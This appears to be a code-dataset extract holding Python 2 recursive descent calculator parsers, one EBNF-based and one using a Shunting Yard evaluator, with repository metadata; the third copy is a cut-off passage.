text stringlengths 0 1.05M | meta dict |
|---|---|
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
# The grammar is LL(1), suitable for predictive parsing.
#
# EBNF:
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
# <assign_stmt> : set <id> = <cmp_expr>
#
## Note 'else' binds to the innermost 'if', like in C
#
# <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
#
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
# <bitor_expr> : <bitxor_expr> {| <bitxor_expr>}
#
# <bitxor_expr> : <bitand_expr> {^ <bitand_expr>}
#
# <bitand_expr> : <shift_expr> {& <shift_expr>}
#
# <shift_expr> : <arith_expr> {<< <arith_expr>}
# | <arith_expr> {>> <arith_expr>}
#
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
# <power> : <factor> ** <power>
# | <factor>
#
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
# <id> : [a-zA-Z_]\w+
# <number> : \d+
#
# Employs EBNF and looping to solve the associativity problem in
# <term> and <arith_expr>.
# Note that <power> is defined recursively and not using EBNF
# grouping {** <factor>}. This is on purpose - as it makes the
# right-associativity of exponentiation naturally expressed in
# the recursion.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception):
    """Signals a syntax or evaluation error while parsing calculator input."""
class CalcParser(object):
    """ The calculator statement parser. Evaluates statements
        and expressions on the fly, returning a numeric result
        for all calc() calls.
    """
    def __init__(self):
        # Longer operators ('**', '>=', '<<', ...) must be listed
        # before their single-character prefixes so the lexer
        # matches them greedily. Raw strings keep regex escapes
        # such as \d and \* intact (non-raw '\d' is an invalid
        # escape sequence in modern Python).
        lex_rules = [
            (r'set', 'SET'),
            (r'if', 'IF'),
            (r'then', 'THEN'),
            (r'else', 'ELSE'),
            (r'\d+', 'NUMBER'),
            (r'[a-zA-Z_]\w*', 'IDENTIFIER'),
            (r'\*\*', '**'),
            (r'!=', '!='),
            (r'==', '=='),
            (r'>=', '>='),
            (r'<=', '<='),
            (r'>>', '>>'),
            (r'<<', '<<'),
            (r'&', '&'),
            (r'\^', '^'),
            (r'\|', '|'),
            (r'<', '<'),
            (r'>', '>'),
            (r'\+', '+'),
            (r'\-', '-'),
            (r'\*', '*'),
            (r'\/', '/'),
            (r'\(', '('),
            (r'\)', ')'),
            (r'=', '='),
        ]
        self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
        self._clear()

    def calc(self, line):
        """ Parse a new line of input and return its result.

            Variables defined in previous calls to calc can be
            used in following ones.
            ParseError can be raised in case of errors.
        """
        self.lexer.input(line)
        self._get_next_token()
        val = self._stmt()
        # A successful parse must consume the whole line; a leftover
        # token means the statement had trailing junk.
        if self.cur_token.type is not None:
            self._error('Unexpected token %s (at #%s)' % (
                self.cur_token.val, self.cur_token.pos))
        return val

    def _clear(self):
        """ Reset parser state: no current token, an empty variable
            table, and side effects enabled.
        """
        self.cur_token = None
        self.var_table = {}
        self.only_syntax_check = False

    # Some rules are parsed with the self.only_syntax_check flag
    # turned on. This means that the syntactic structure of the
    # rules has to be checked, but no side effects are to be
    # executed. Example side effect: assignment to a variable.
    #
    # This is used, for example, when a branch of an if statement
    # is not taken (e.g. the 'else' branch of a true condition),
    # but we should still verify that the syntax is correct.
    #
    @contextmanager
    def _syntax_check(self):
        """ Context manager that enables only_syntax_check for the
            duration of a with-block.
        """
        # The finally clause alone guarantees the flag is reset even
        # when an exception (e.g. ParseError) escapes, so subsequent
        # statements won't be affected. The former bare
        # 'except: raise' was redundant with finally.
        try:
            self.only_syntax_check = True
            yield
        finally:
            self.only_syntax_check = False

    def _error(self, msg):
        """ Report a parse failure by raising ParseError. """
        raise ParseError(msg)

    def _get_next_token(self):
        """ Advance self.cur_token to the next token. End of input
            is represented by a token whose fields are all None.
        """
        try:
            self.cur_token = self.lexer.token()
            if self.cur_token is None:
                self.cur_token = lexer.Token(None, None, None)
        except lexer.LexerError as e:
            self._error('Lexer error at position %d' % e.pos)

    def _match(self, toktype):
        """ The 'match' primitive of RD parsers.

            * Verifies that the current token is of the given type
            * Returns the value of the current token
            * Reads in the next token
        """
        # Parameter renamed from 'type' to avoid shadowing the builtin.
        if self.cur_token.type == toktype:
            val = self.cur_token.val
            self._get_next_token()
            return val
        else:
            self._error('Unmatched %s (found %s)' % (
                toktype, self.cur_token.type))

    # The toplevel rule of the parser.
    #
    # <stmt> : <assign_stmt>
    #        | <if_stmt>
    #        | <cmp_expr>
    #
    def _stmt(self):
        """ Parse a single statement and return its value. """
        if self.cur_token.type is None:
            # Empty input line.
            return ''
        elif self.cur_token.type == 'SET':
            return self._assign_stmt()
        elif self.cur_token.type == 'IF':
            return self._if_stmt()
        else:
            return self._cmp_expr()

    # <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
    #
    def _if_stmt(self):
        """ Parse an if statement. Only the branch actually taken
            is evaluated; the other branch (if present) is parsed
            for syntax only, without side effects.
        """
        self._match('IF')
        condition = self._cmp_expr()
        self._match('THEN')
        if condition:
            result = self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                with self._syntax_check():
                    self._stmt()
            return result
        else:
            with self._syntax_check():
                self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                return self._stmt()
            else:
                # False condition and no else clause: no value.
                return None

    # <assign_stmt> : set <id> = <cmp_expr>
    #
    def _assign_stmt(self):
        """ Parse an assignment and return the assigned value. """
        self._match('SET')
        id_name = self._match('IDENTIFIER')
        self._match('=')
        expr_val = self._cmp_expr()
        # When syntax checking, don't actually do the assignment.
        if not self.only_syntax_check:
            self.var_table[id_name] = expr_val
        return expr_val

    # <cmp_expr> : <bitor_expr> [== <bitor_expr>]
    #            | <bitor_expr> [!= <bitor_expr>]
    #            | <bitor_expr> [> <bitor_expr>]
    #            | <bitor_expr> [< <bitor_expr>]
    #            | <bitor_expr> [>= <bitor_expr>]
    #            | <bitor_expr> [<= <bitor_expr>]
    #
    # Maps comparison token types to their evaluation functions.
    _cmp_op_map = {
        '==': operator.eq,
        '!=': operator.ne,
        '>=': operator.ge,
        '>': operator.gt,
        '<=': operator.le,
        '<': operator.lt,
    }

    def _cmp_expr(self):
        """ Parse an (optional) comparison between two bitwise-or
            expressions.
        """
        lval = self._bitor_expr()
        # A direct dict lookup replaces the former linear
        # iteritems()/apply() scan; at most one comparison can
        # follow the left operand.
        op = self._cmp_op_map.get(self.cur_token.type)
        if op is not None:
            self._match(self.cur_token.type)
            return op(lval, self._bitor_expr())
        # No comparison op matched.
        return lval

    # <bitor_expr> : <bitxor_expr> {| <bitxor_expr>}
    #
    def _bitor_expr(self):
        """ Parse a left-associative chain of '|' operators. """
        lval = self._bitxor_expr()
        while self.cur_token.type == '|':
            self._match('|')
            lval |= self._bitxor_expr()
        return lval

    # <bitxor_expr> : <bitand_expr> {^ <bitand_expr>}
    #
    def _bitxor_expr(self):
        """ Parse a left-associative chain of '^' operators. """
        lval = self._bitand_expr()
        while self.cur_token.type == '^':
            self._match('^')
            lval ^= self._bitand_expr()
        return lval

    # <bitand_expr> : <shift_expr> {& <shift_expr>}
    #
    def _bitand_expr(self):
        """ Parse a left-associative chain of '&' operators. """
        lval = self._shift_expr()
        while self.cur_token.type == '&':
            self._match('&')
            lval &= self._shift_expr()
        return lval

    # <shift_expr> : <arith_expr> {<< <arith_expr>}
    #              | <arith_expr> {>> <arith_expr>}
    #
    def _shift_expr(self):
        """ Parse a left-associative chain of shift operators. """
        lval = self._arith_expr()
        while self.cur_token.type in ('>>', '<<'):
            if self.cur_token.type == '>>':
                self._match('>>')
                lval >>= self._arith_expr()
            else:
                self._match('<<')
                lval <<= self._arith_expr()
        return lval

    # <arith_expr> : <term> {+ <term>}
    #              | <term> {- <term>}
    #
    def _arith_expr(self):
        """ Parse a left-associative chain of '+'/'-' operators. """
        lval = self._term()
        while self.cur_token.type in ('+', '-'):
            if self.cur_token.type == '+':
                self._match('+')
                lval += self._term()
            else:
                self._match('-')
                lval -= self._term()
        return lval

    # <term> : <power> {* <power>}
    #        | <power> {/ <power>}
    #
    def _term(self):
        """ Parse a left-associative chain of '*'/'/' operators. """
        lval = self._power()
        while self.cur_token.type in ('/', '*'):
            if self.cur_token.type == '*':
                self._match('*')
                lval *= self._power()
            else:
                self._match('/')
                # Floor division keeps results integral: this is an
                # integer calculator, and true division would yield
                # floats under Python 3 (Python 2's int '/' floors
                # anyway, so behavior is unchanged there).
                lval //= self._power()
        return lval

    # <power> : <factor> ** <power>
    #         | <factor>
    #
    def _power(self):
        """ Parse an exponentiation chain. The recursion into
            _power expresses the right-associativity of '**'
            naturally.
        """
        lval = self._factor()
        if self.cur_token.type == '**':
            self._match('**')
            lval **= self._power()
        return lval

    # <factor> : <id>
    #          | <number>
    #          | - <factor>
    #          | ( <cmp_expr> )
    #
    def _factor(self):
        """ Parse a factor: a literal, a variable reference, a
            unary minus, or a parenthesized expression.
        """
        if self.cur_token.type == '(':
            self._match('(')
            val = self._cmp_expr()
            self._match(')')
            return val
        elif self.cur_token.type == 'NUMBER':
            return int(self._match('NUMBER'))
        elif self.cur_token.type == '-':
            self._match('-')
            return -(self._factor())
        elif self.cur_token.type == 'IDENTIFIER':
            id_name = self._match('IDENTIFIER')
            # When syntax checking, we don't care if the variable
            # was defined prior to use.
            if self.only_syntax_check:
                return 0
            try:
                val = self.var_table[id_name]
            except KeyError:
                self._error('Unknown identifier `%s`' % id_name)
            return val
        else:
            self._error('Invalid factor `%s`' % self.cur_token.val)
def calculator_prompt():
    """ A toy calculator prompt for interactive computations.
    """
    # NOTE: Python 2 only (print statement, raw_input).
    print 'Welcome to the calculator. Press Ctrl+C to exit.'
    cp = CalcParser()
    try:
        while True:
            try:
                line = raw_input('--> ')
                print cp.calc(line)
            except ParseError, err:
                # Report the error and keep the prompt alive.
                print 'Error:', err
    except KeyboardInterrupt:
        # Ctrl+C is the normal way to leave the prompt.
        print '... Thanks for using the calculator.'
if __name__ == '__main__':
    import sys
    # With '-p', run the interactive prompt instead of the self-test.
    if len(sys.argv) > 1 and sys.argv[1] == '-p':
        calculator_prompt()
        sys.exit()
    p = CalcParser()
    #
    # If stuff works correctly, this will print 42
    #
    # NOTE(review): '-' is left-associative, so 4 - 5 - 1 evaluates
    # to -2, not 0 as the annotation below claims — confirm intent.
    p.calc('set joe = 4 - 5 - 1') # 0
    print p.calc('joe')
    #~ p.calc('set mar = joe + 2 ** 4 * -3') # -48
    #~ p.calc('set pie = 2 ** 3 ** 2') # 512
    #~ p.calc('if joe != 0 then set pie = 3') # pie stays 512
    #~ p.calc('if 1 == 1 then set k = 10 else set k = 20') # 10
    #~ p.calc('if k > 20 then set k = 12') # k stays 10
    #~ p.calc('if k <= 11 then set t = 0 else set t = 2') # 0
    #~ print p.calc('pie - (k * -mar) + k + t') # 42
| {
"repo_name": "evandrix/Splat",
"path": "doc/parser/rd_parser_ebnf.py",
"copies": "1",
"size": "13915",
"license": "mit",
"hash": 65001764496569220,
"line_mean": 29.3820960699,
"line_max": 68,
"alpha_frac": 0.4421846928,
"autogenerated": false,
"ratio": 3.84073971846536,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9688943106999789,
"avg_score": 0.018796260853114203,
"num_lines": 458
} |
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
#
# This parser implements exactly the same grammar as
# rd_parser_ebnf, but it evaluates expressions using a different
# technique. Instead of recursively evaluating them following the
# EBNF grammar, it uses an embedded infix expression evaluator
# based on the Shunting Yard algorithm.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception):
    """Signals a syntax or evaluation error while parsing calculator input."""
class CalcParser(object):
    """ The calculator statement parser. Evaluates statements
        and expressions on the fly, returning a numeric result
        for all calc() calls.

        Unlike the pure-EBNF variant, expressions are evaluated by
        an embedded infix evaluator based on the Shunting Yard
        algorithm.
    """
    def __init__(self):
        # Longer operators ('**', '>=', '<<', ...) must be listed
        # before their single-character prefixes so the lexer
        # matches them greedily. Raw strings keep regex escapes
        # such as \d and \* intact.
        lex_rules = [
            (r'set', 'SET'),
            (r'if', 'IF'),
            (r'then', 'THEN'),
            (r'else', 'ELSE'),
            (r'\d+', 'NUMBER'),
            (r'[a-zA-Z_]\w*', 'IDENTIFIER'),
            (r'\*\*', '**'),
            (r'!=', '!='),
            (r'==', '=='),
            (r'>=', '>='),
            (r'<=', '<='),
            (r'>>', '>>'),
            (r'<<', '<<'),
            (r'&', '&'),
            (r'\^', '^'),
            (r'\|', '|'),
            (r'<', '<'),
            (r'>', '>'),
            (r'\+', '+'),
            (r'\-', '-'),
            (r'\*', '*'),
            (r'\/', '/'),
            (r'\(', '('),
            (r'\)', ')'),
            (r'=', '='),
        ]
        self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
        self._clear()

    def calc(self, line):
        """ Parse a new line of input and return its result.

            Variables defined in previous calls to calc can be
            used in following ones.
            ParseError can be raised in case of errors.
        """
        self.lexer.input(line)
        self._get_next_token()
        val = self._stmt()
        # A successful parse must consume the whole line; a leftover
        # token means the statement had trailing junk.
        if self.cur_token.type is not None:
            self._error('Unexpected token %s (at #%s)' % (
                self.cur_token.val, self.cur_token.pos))
        return val

    def _clear(self):
        """ Reset parser state: no current token, an empty variable
            table, and side effects enabled.
        """
        self.cur_token = None
        self.var_table = {}
        self.only_syntax_check = False

    # Some rules are parsed with the self.only_syntax_check flag
    # turned on. This means that the syntactic structure of the
    # rules has to be checked, but no side effects are to be
    # executed. Example side effect: assignment to a variable.
    #
    # This is used, for example, when a branch of an if statement
    # is not taken (e.g. the 'else' branch of a true condition),
    # but we should still verify that the syntax is correct.
    #
    @contextmanager
    def _syntax_check(self):
        """ Context manager that enables only_syntax_check for the
            duration of a with-block.
        """
        # The finally clause alone guarantees the flag is reset even
        # when an exception (e.g. ParseError) escapes, so subsequent
        # statements won't be affected. The former bare
        # 'except: raise' was redundant with finally.
        try:
            self.only_syntax_check = True
            yield
        finally:
            self.only_syntax_check = False

    def _error(self, msg):
        """ Report a parse failure by raising ParseError. """
        raise ParseError(msg)

    def _get_next_token(self):
        """ Advance self.cur_token to the next token. End of input
            is represented by a token whose fields are all None.
        """
        try:
            self.cur_token = self.lexer.token()
            if self.cur_token is None:
                self.cur_token = lexer.Token(None, None, None)
        except lexer.LexerError as e:
            self._error('Lexer error at position %d' % e.pos)

    def _match(self, toktype):
        """ The 'match' primitive of RD parsers.

            * Verifies that the current token is of the given type
            * Returns the value of the current token
            * Reads in the next token
        """
        # Parameter renamed from 'type' to avoid shadowing the builtin.
        if self.cur_token.type == toktype:
            val = self.cur_token.val
            self._get_next_token()
            return val
        else:
            self._error('Unmatched %s (found %s)' % (
                toktype, self.cur_token.type))

    # The toplevel rule of the parser.
    #
    # <stmt> : <assign_stmt>
    #        | <if_stmt>
    #        | <infix_expr>
    #
    def _stmt(self):
        """ Parse a single statement and return its value. """
        if self.cur_token.type is None:
            # Empty input line.
            return ''
        elif self.cur_token.type == 'SET':
            return self._assign_stmt()
        elif self.cur_token.type == 'IF':
            return self._if_stmt()
        else:
            return self._infix_eval()

    # <if_stmt> : if <infix_expr> then <stmt> [else <stmt>]
    #
    def _if_stmt(self):
        """ Parse an if statement. Only the branch actually taken
            is evaluated; the other branch (if present) is parsed
            for syntax only, without side effects.
        """
        self._match('IF')
        condition = self._infix_eval()
        self._match('THEN')
        if condition:
            result = self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                with self._syntax_check():
                    self._stmt()
            return result
        else:
            with self._syntax_check():
                self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                return self._stmt()
            else:
                # False condition and no else clause: no value.
                return None

    # <assign_stmt> : set <id> = <infix_expr>
    #
    def _assign_stmt(self):
        """ Parse an assignment and return the assigned value. """
        self._match('SET')
        id_name = self._match('IDENTIFIER')
        self._match('=')
        expr_val = self._infix_eval()
        # When syntax checking, don't actually do the assignment.
        if not self.only_syntax_check:
            self.var_table[id_name] = expr_val
        return expr_val

    ##
    ## The infix expression evaluator.
    ## Returns the value of the evaluated expression.
    ##
    ## Infix expressions are numbers and identifiers separated by
    ## binary (and unary) operators, possibly with parts delimited
    ## by parentheses. The operators supported by this evaluator
    ## and their precedences are controlled through the _ops
    ## table.
    ##
    ## Internally, uses two stacks. One for keeping the operations
    ## that still await results, and another for keeping the
    ## results.
    ##
    def _infix_eval(self):
        """ Run the infix evaluator and return the result.
        """
        self.op_stack = []
        self.res_stack = []
        # The sentinel marks the bottom of the operator stack.
        self.op_stack.append(self._sentinel)
        self._infix_eval_expr()
        return self.res_stack[-1]

    class Op(object):
        """ Represents an operator recognized by the infix
            evaluator. Each operator has a numeric precedence,
            and flags specifying whether it's unary/binary and
            right/left associative.
        """
        def __init__(self, name, op, prec,
                     unary=False, right_assoc=False):
            self.name = name
            self.op = op
            self.prec = prec
            self.unary = unary
            self.binary = not self.unary
            self.right_assoc = right_assoc
            self.left_assoc = not self.right_assoc

        def apply(self, *args):
            """ Apply the wrapped function to the arguments. """
            return self.op(*args)

        def precedes(self, other):
            """ The '>' operator from the Shunting Yard algorithm.
                I don't call it '>' on purpose, as its semantics
                are unusual (i.e. this is not the familiar
                algebraic '>')
            """
            if self.binary and other.binary:
                if self.prec > other.prec:
                    return True
                elif self.left_assoc and (self.prec == other.prec):
                    return True
            elif self.unary and other.binary:
                return self.prec >= other.prec
            return False

        def __repr__(self):
            return '<%s(%s)>' % (self.name, self.prec)

    # The operators recognized by the evaluator.
    #
    _ops = {
        'u-': Op('unary -', operator.neg, 90, unary=True),
        '**': Op('**', operator.pow, 70, right_assoc=True),
        '*': Op('*', operator.mul, 50),
        # floordiv matches Python 2's integer '/' exactly and, unlike
        # the removed operator.div, exists on Python 3 without
        # producing floats in this integer calculator.
        '/': Op('/', operator.floordiv, 50),
        '+': Op('+', operator.add, 40),
        '-': Op('-', operator.sub, 40),
        '<<': Op('<<', operator.lshift, 35),
        '>>': Op('>>', operator.rshift, 35),
        '&': Op('&', operator.and_, 30),
        '^': Op('^', operator.xor, 29),
        '|': Op('|', operator.or_, 28),
        '>': Op('>', operator.gt, 20),
        '>=': Op('>=', operator.ge, 20),
        '<': Op('<', operator.lt, 20),
        '<=': Op('<=', operator.le, 20),
        '==': Op('==', operator.eq, 15),
        '!=': Op('!=', operator.ne, 15),
    }

    # A set of operators that can be unary. If such an operator
    # is found, 'u' is prepended to its symbol for finding it in
    # the _ops table
    #
    _unaries = set(['-'])

    # Dummy operator with the lowest possible precedence (the
    # Sentinel value in the Shunting Yard algorithm)
    #
    _sentinel = Op(None, None, 0)

    def _infix_eval_expr(self):
        """ Evaluates an 'expression' - atoms separated by binary
            operators.
        """
        self._infix_eval_atom()
        while (self.cur_token.type in self._ops and
               self._ops[self.cur_token.type].binary):
            self._push_op(self._ops[self.cur_token.type])
            self._get_next_token()
            self._infix_eval_atom()
        # Flush the remaining operators down to the sentinel.
        while self.op_stack[-1] is not self._sentinel:
            self._pop_op()

    def _infix_eval_atom(self):
        """ Evaluates an 'atom' - either an identifier/number, or
            an atom prefixed by a unary operation, or a full
            expression inside parentheses.
        """
        if self.cur_token.type in ('IDENTIFIER', 'NUMBER'):
            self.res_stack.append(self._compute_val(self.cur_token))
            self._get_next_token()
        elif self.cur_token.type == '(':
            self._get_next_token()
            # A nested sentinel isolates the parenthesized
            # sub-expression from the operators outside it.
            self.op_stack.append(self._sentinel)
            self._infix_eval_expr()
            self._match(')')
            self.op_stack.pop()
        elif self.cur_token.type in self._unaries:
            self._push_op(self._ops['u' + self.cur_token.type])
            self._get_next_token()
            self._infix_eval_atom()
        else:
            # Previously this fell through silently, leaving the
            # result stack short and crashing later with an
            # IndexError; report a proper parse error instead.
            self._error('Invalid atom `%s`' % self.cur_token.val)

    def _push_op(self, op):
        """ Pushes an operation onto the op stack.
            But first computes and removes all higher-precedence
            operators from it.
        """
        while self.op_stack[-1].precedes(op):
            self._pop_op()
        self.op_stack.append(op)

    def _pop_op(self):
        """ Pops an operation from the op stack, computing its
            result and storing it on the result stack.
        """
        top_op = self.op_stack.pop()
        if top_op.unary:
            self.res_stack.append(top_op.apply(self.res_stack.pop()))
        else:
            if len(self.res_stack) < 2:
                self._error('Not enough arguments for operator %s' % top_op.name)
            t1 = self.res_stack.pop()
            t0 = self.res_stack.pop()
            # t0 was pushed first, so it is the left operand.
            self.res_stack.append(top_op.apply(t0, t1))

    def _compute_val(self, tok):
        """ Compute the value of a number or an identifier token.
        """
        if tok.type == 'NUMBER':
            return int(tok.val)
        elif tok.type == 'IDENTIFIER':
            # When syntax checking, we don't require the variable
            # to be defined; any numeric stand-in will do.
            if self.only_syntax_check:
                return 0
            else:
                try:
                    val = self.var_table[tok.val]
                except KeyError:
                    self._error('Unknown identifier `%s`' % tok.val)
                return val
        else:
            # Callers only pass NUMBER/IDENTIFIER tokens here.
            assert 0
if __name__ == '__main__':
    # Quick smoke test of the infix evaluator (Python 2 script).
    p = CalcParser()
    # 2 + 4 - (8 + 5) * 3 ** 2 - 1 == -112
    print p.calc('2 + 4 - (8 + 5) * 3 ** 2 - 1')
    #~ p.calc('set p = 1')
    #~ p.calc('set p = p * 2')
    #~ p.calc('if 5 > 5 then set p = p * 2 else set p = 0')
| {
"repo_name": "michaelyin/code-for-blog",
"path": "2009/py_rd_parser_example/rd_parser_infix_expr.py",
"copies": "12",
"size": "13987",
"license": "unlicense",
"hash": 3738381671224765400,
"line_mean": 32.6336633663,
"line_max": 81,
"alpha_frac": 0.4715092586,
"autogenerated": false,
"ratio": 4.2604325312214435,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
# The grammar is LL(1), suitable for predictive parsing.
#
# EBNF:
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
# <assign_stmt> : set <id> = <cmp_expr>
#
## Note 'else' binds to the innermost 'if', like in C
#
# <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
#
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
# <bitor_expr> : <bitxor_expr> {| <bitxor_expr>}
#
# <bitxor_expr> : <bitand_expr> {^ <bitand_expr>}
#
# <bitand_expr> : <shift_expr> {& <shift_expr>}
#
# <shift_expr> : <arith_expr> {<< <arith_expr>}
# | <arith_expr> {>> <arith_expr>}
#
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
# <power> : <factor> ** <power>
# | <factor>
#
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
# <id> : [a-zA-Z_]\w+
# <number> : \d+
#
# Employs EBNF and looping to solve the associativity problem in
# <term> and <arith_expr>.
# Note that <power> is defined recursively and not using EBNF
# grouping {** <factor>}. This is on purpose - as it makes the
# right-associativity of exponentiation naturally expressed in
# the recursion.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception):
    """Signals a syntax or evaluation error while parsing calculator input."""
class CalcParser(object):
    """ The calculator statement parser. Evaluates statements
        and expressions on the fly, returning a numeric result
        for all calc() calls.
    """
    def __init__(self):
        # Longer operators ('**', '>=', '<<', ...) must be listed
        # before their single-character prefixes so the lexer
        # matches them greedily. Raw strings keep regex escapes
        # such as \d and \* intact (non-raw '\d' is an invalid
        # escape sequence in modern Python).
        lex_rules = [
            (r'set', 'SET'),
            (r'if', 'IF'),
            (r'then', 'THEN'),
            (r'else', 'ELSE'),
            (r'\d+', 'NUMBER'),
            (r'[a-zA-Z_]\w*', 'IDENTIFIER'),
            (r'\*\*', '**'),
            (r'!=', '!='),
            (r'==', '=='),
            (r'>=', '>='),
            (r'<=', '<='),
            (r'>>', '>>'),
            (r'<<', '<<'),
            (r'&', '&'),
            (r'\^', '^'),
            (r'\|', '|'),
            (r'<', '<'),
            (r'>', '>'),
            (r'\+', '+'),
            (r'\-', '-'),
            (r'\*', '*'),
            (r'\/', '/'),
            (r'\(', '('),
            (r'\)', ')'),
            (r'=', '='),
        ]
        self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
        self._clear()

    def calc(self, line):
        """ Parse a new line of input and return its result.

            Variables defined in previous calls to calc can be
            used in following ones.
            ParseError can be raised in case of errors.
        """
        self.lexer.input(line)
        self._get_next_token()
        val = self._stmt()
        # A successful parse must consume the whole line; a leftover
        # token means the statement had trailing junk.
        if self.cur_token.type is not None:
            self._error('Unexpected token %s (at #%s)' % (
                self.cur_token.val, self.cur_token.pos))
        return val

    def _clear(self):
        """ Reset parser state: no current token, an empty variable
            table, and side effects enabled.
        """
        self.cur_token = None
        self.var_table = {}
        self.only_syntax_check = False

    # Some rules are parsed with the self.only_syntax_check flag
    # turned on. This means that the syntactic structure of the
    # rules has to be checked, but no side effects are to be
    # executed. Example side effect: assignment to a variable.
    #
    # This is used, for example, when a branch of an if statement
    # is not taken (e.g. the 'else' branch of a true condition),
    # but we should still verify that the syntax is correct.
    #
    @contextmanager
    def _syntax_check(self):
        """ Context manager that enables only_syntax_check for the
            duration of a with-block.
        """
        # The finally clause alone guarantees the flag is reset even
        # when an exception (e.g. ParseError) escapes, so subsequent
        # statements won't be affected. The former bare
        # 'except: raise' was redundant with finally.
        try:
            self.only_syntax_check = True
            yield
        finally:
            self.only_syntax_check = False

    def _error(self, msg):
        """ Report a parse failure by raising ParseError. """
        raise ParseError(msg)

    def _get_next_token(self):
        """ Advance self.cur_token to the next token. End of input
            is represented by a token whose fields are all None.
        """
        try:
            self.cur_token = self.lexer.token()
            if self.cur_token is None:
                self.cur_token = lexer.Token(None, None, None)
        except lexer.LexerError as e:
            self._error('Lexer error at position %d' % e.pos)

    def _match(self, toktype):
        """ The 'match' primitive of RD parsers.

            * Verifies that the current token is of the given type
            * Returns the value of the current token
            * Reads in the next token
        """
        # Parameter renamed from 'type' to avoid shadowing the builtin.
        if self.cur_token.type == toktype:
            val = self.cur_token.val
            self._get_next_token()
            return val
        else:
            self._error('Unmatched %s (found %s)' % (
                toktype, self.cur_token.type))

    # The toplevel rule of the parser.
    #
    # <stmt> : <assign_stmt>
    #        | <if_stmt>
    #        | <cmp_expr>
    #
    def _stmt(self):
        """ Parse a single statement and return its value. """
        if self.cur_token.type is None:
            # Empty input line.
            return ''
        elif self.cur_token.type == 'SET':
            return self._assign_stmt()
        elif self.cur_token.type == 'IF':
            return self._if_stmt()
        else:
            return self._cmp_expr()

    # <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
    #
    def _if_stmt(self):
        """ Parse an if statement. Only the branch actually taken
            is evaluated; the other branch (if present) is parsed
            for syntax only, without side effects.
        """
        self._match('IF')
        condition = self._cmp_expr()
        self._match('THEN')
        if condition:
            result = self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                with self._syntax_check():
                    self._stmt()
            return result
        else:
            with self._syntax_check():
                self._stmt()
            if self.cur_token.type == 'ELSE':
                self._match('ELSE')
                return self._stmt()
            else:
                # False condition and no else clause: no value.
                return None

    # <assign_stmt> : set <id> = <cmp_expr>
    #
    def _assign_stmt(self):
        """ Parse an assignment and return the assigned value. """
        self._match('SET')
        id_name = self._match('IDENTIFIER')
        self._match('=')
        expr_val = self._cmp_expr()
        # When syntax checking, don't actually do the assignment.
        if not self.only_syntax_check:
            self.var_table[id_name] = expr_val
        return expr_val

    # <cmp_expr> : <bitor_expr> [== <bitor_expr>]
    #            | <bitor_expr> [!= <bitor_expr>]
    #            | <bitor_expr> [> <bitor_expr>]
    #            | <bitor_expr> [< <bitor_expr>]
    #            | <bitor_expr> [>= <bitor_expr>]
    #            | <bitor_expr> [<= <bitor_expr>]
    #
    # Maps comparison token types to their evaluation functions.
    _cmp_op_map = {
        '==': operator.eq,
        '!=': operator.ne,
        '>=': operator.ge,
        '>': operator.gt,
        '<=': operator.le,
        '<': operator.lt,
    }

    def _cmp_expr(self):
        """ Parse an (optional) comparison between two bitwise-or
            expressions.
        """
        lval = self._bitor_expr()
        # A direct dict lookup replaces the former linear
        # iteritems()/apply() scan; at most one comparison can
        # follow the left operand.
        op = self._cmp_op_map.get(self.cur_token.type)
        if op is not None:
            self._match(self.cur_token.type)
            return op(lval, self._bitor_expr())
        # No comparison op matched.
        return lval

    # <bitor_expr> : <bitxor_expr> {| <bitxor_expr>}
    #
    def _bitor_expr(self):
        """ Parse a left-associative chain of '|' operators. """
        lval = self._bitxor_expr()
        while self.cur_token.type == '|':
            self._match('|')
            lval |= self._bitxor_expr()
        return lval

